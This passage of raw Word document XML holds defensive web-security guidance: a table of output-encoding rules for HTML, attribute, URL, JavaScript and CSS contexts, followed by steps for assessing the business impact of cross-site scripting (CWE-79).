            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>, Convert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>, Convert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>, Convert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;quot;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>, Convert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;#x27;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="540"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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HTML Attribute Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860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Encode all characters with the HTML Entity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;#xHH;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>format, including spaces, where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="true"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>HH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>represents the hexadecimal value of the character in Unicode. For example,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>becomes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;#x41;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>. All alphanumeric characters (letters A to Z, a to z, and digits 0 to 9) remain unencoded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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URL Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860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Use standard percent encoding, as specified in the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="15"/>
                <w:u w:val="single" w:color="0000ff"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "http://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.1"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="15"/>
                <w:u w:val="single" w:color="0000ff"/>
              </w:rPr>
              <w:t>W3C specification</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>, to encode parameter values. Be cautious and encode only parameter values, not the entire URL or path fragments of a URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="540"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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JavaScript Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860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Encode all characters using the Unicode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\uXXXX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>encoding format, where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="true"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>XXXX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>represents the hexadecimal Unicode code point. For example,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>becomes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\u0041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>. All alphanumeric characters (letters A to Z, a to z, and digits 0 to 9) remain unencoded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="720"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710"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CSS Hex Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8609" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="144" w:type="dxa"/>
              <w:left w:w="191" w:type="dxa"/>
              <w:bottom w:w="144" w:type="dxa"/>
              <w:right w:w="191" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>CSS encoding supports both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\XX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\XXXXXX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>formats. To ensure proper encoding, consider these options: (a) Add a space after the CSS encode (which will be ignored by the CSS parser), or (b) use the full six-character CSS encoding format by zero-padding the value. For example,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>becomes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>(short format) or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\000041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>(full format). Alphanumeric characters (letters A to Z, a to z, and digits 0 to 9) remain unencoded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:after="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>CWE-79 is a specific Common Weakness Enumeration (CWE) identifier related to "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')." This vulnerability, commonly referred to as Cross-Site Scripting (XSS), can have a significant impact on an organization's business. To conduct a thorough analysis of the potential business impact of CWE-79, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Identify Vulnerable Systems and Assets:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Determine which systems, applications, or web pages are susceptible to CWE-79 (XSS). This may include web applications, online services, or any software that handles user-generated content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Categorize the Severity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assess the severity of the vulnerability by identifying the type of XSS (e.g., stored, reflected, or DOM-based) and the potential consequences it may have on the affected systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Analyze Data Sensitivity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Examine the nature of data processed by the vulnerable systems. Determine if it involves sensitive information such as user credentials, financial data, personal information, or proprietary business data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Evaluate Attack Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Explore potential attack scenarios that could be exploited due to CWE-79. Consider how an attacker might leverage XSS to compromise confidentiality, integrity, or availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assess Impact on Confidentiality:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Determine how the vulnerability could lead to the unauthorized disclosure of sensitive data, which could have legal, reputational, and financial consequences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assess Impact on Integrity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Consider how an attacker could manipulate data on affected systems, potentially leading to fraudulent activities, data corruption, or other forms of damage to data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assess Impact on Availability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Examine how a successful XSS attack could disrupt services, rendering them unavailable to users. This could result in lost revenue and customer dissatisfaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Quantify Potential Losses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Estimate potential financial losses associated with each impact scenario. This could include costs related to data breaches, legal penalties, service downtime, and customer loss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Consider Reputational Damage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Recognize that a successful CWE-79 exploitation can damage an organization's reputation, affecting trust and customer loyalty. Quantify the potential impact on the company's brand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Prioritize Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
